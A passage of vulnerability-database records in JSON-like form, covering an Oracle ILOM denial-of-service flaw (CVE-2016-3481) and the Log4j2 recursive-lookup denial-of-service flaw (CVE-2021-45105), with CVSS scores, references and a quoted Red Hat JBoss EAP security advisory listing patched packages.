profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003869", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, ], trust: 0.6, }, cve: "CVE-2016-3481", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 4, confidentialityImpact: "NONE", exploitabilityScore: 8, id: "CVE-2016-3481", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:S/C:N/I:N/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 4, confidentialityImpact: "NONE", exploitabilityScore: 8, id: "VHN-92300", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:S/C:N/I:N/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "NONE", exploitabilityScore: 3.1, id: "CVE-2016-3481", impactScore: 4, integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-3481", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-3481", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-678", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-92300", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-3481", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect availability via vectors related to Web. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'HTTP' protocol. The 'Web' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker can exploit this vulnerability to cause a denial of service and affect data availability", sources: [ { db: "NVD", id: "CVE-2016-3481", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-3481", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91977", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003869", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-678", trust: 0.7, }, { db: "VULHUB", id: "VHN-92300", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-3481", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, id: "VAR-201607-0605", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-92300", }, ], trust: 0.01, }, last_update_date: "2024-11-23T21:02:58.529000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component denial of service vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63038", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3481", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-3481", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91977", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3481", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3481", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-92300", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-3481", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91977", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003869", }, { date: "2016-07-22T00:00:00", db: "CNNVD", id: "CNNVD-201607-678", }, { date: "2016-07-21T10:12:35.087000", db: "NVD", id: "CVE-2016-3481", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-92300", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-3481", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91977", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003869", }, { date: "2016-07-22T00:00:00", db: "CNNVD", id: "CNNVD-201607-678", }, { date: "2024-11-21T02:50:06", db: "NVD", id: "CVE-2016-3481", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Web Vulnerability", sources: [ { db: "JVNDB", id: "JVNDB-2016-003869", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, ], trust: 0.6, }, }
var-202112-1782
Vulnerability from variot
Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apache Log4j. Authentication is not required to exploit this vulnerability.The specific flaw exists within the StrSubstitutor class. The issue results from the lack of proper validation of user-supplied data, which can result in a resource exhaustion condition. An attacker can leverage this vulnerability to create a denial-of-service condition on the process. Log4j is an open source project of Apache. By using Log4j, the destination of log information transmission can be controlled to be console, file, GUI component, even socket server, NT event recorder, etc. Apache Log4j2 has a denial of service vulnerability. This vulnerability is due to the fact that Apache Log4j2 is configured with a non-default Pattern Layout scenario with Context Lookup (for example: $${ctx:loginId}), attackers can use this vulnerability to construct malicious data and execute denial of service without authorization attack, eventually causing the server to denial of service.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update Advisory ID: RHSA-2022:1297-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://access.redhat.com/errata/RHSA-2022:1297 Issue date: 2022-04-11 CVE Names: CVE-2021-4104 CVE-2021-44832 CVE-2021-45046 CVE-2021-45105 CVE-2022-23302 CVE-2022-23305 CVE-2022-23307 =====================================================================
- Summary:
A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss EAP 7.4 for RHEL 8 - noarch, x86_64
- Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.4 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
-
log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender (CVE-2022-23305)
-
log4j: Unsafe deserialization flaw in Chainsaw log viewer (CVE-2022-23307)
-
log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)
-
log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)
-
log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
-
log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)
-
log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink (CVE-2022-23302)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2031667 - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender 2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) 2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern 2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender 2041949 - CVE-2022-23302 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink 2041959 - CVE-2022-23305 log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender 2041967 - CVE-2022-23307 log4j: Unsafe deserialization flaw in Chainsaw log viewer
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7 JBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1 JBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034 JBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17) JBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console JBEAP-22839 - GSS Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001 JBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001 JBEAP-22900 - Tracker bug for the EAP 7.4.4 release for RHEL-8 JBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002 JBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001 JBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001 JBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001 JBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002 JBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final JBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final JBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001 JBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final JBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001 JBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26 JBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001 JBEAP-23323 - GSS WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend JBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002 JBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001 JBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002
- Package List:
Red Hat JBoss EAP 7.4 for RHEL 8:
Source: eap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.src.rpm eap7-ecj-3.26.0-1.redhat_00002.1.el8eap.src.rpm eap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.src.rpm eap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.src.rpm eap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.src.rpm eap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.src.rpm eap7-log4j-2.17.1-1.redhat_00001.1.el8eap.src.rpm eap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.src.rpm eap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.src.rpm eap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.src.rpm eap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.src.rpm eap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.src.rpm eap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.src.rpm eap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.src.rpm eap7-xom-1.3.7-1.redhat_00001.1.el8eap.src.rpm eap7-yasson-1.0.10-1.redhat_00001.1.el8eap.src.rpm
noarch: eap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-cli-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-commons-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-core-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-dto-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-hornetq-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-hqclient-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jdbc-store-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jms-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jms-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-journal-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-ra-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-selector-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-service-extensions-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-tools-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-ecj-3.26.0-1.redhat_00002.1.el8eap.noarch.rpm eap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-core-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-entitymanager-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-envers-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-java8-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-cachestore-jdbc-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-cachestore-remote-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-client-hotrod-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-component-annotations-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-core-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-spi-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-v53-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-server-migration-cli-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-server-migration-core-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-log4j-2.17.1-1.redhat_00001.1.el8eap.noarch.rpm eap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-compensations-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jbosstxbridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jbossxts-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jts-idlj-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jts-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-api-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-bridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-util-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-txframework-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.noarch.rpm eap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm eap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-elytron-tool-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-javadocs-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm eap7-wildfly-modules-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm eap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-openssl-java-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm eap7-xom-1.3.7-1.redhat_00001.1.el8eap.noarch.rpm eap7-yasson-1.0.10-1.redhat_00001.1.el8eap.noarch.rpm
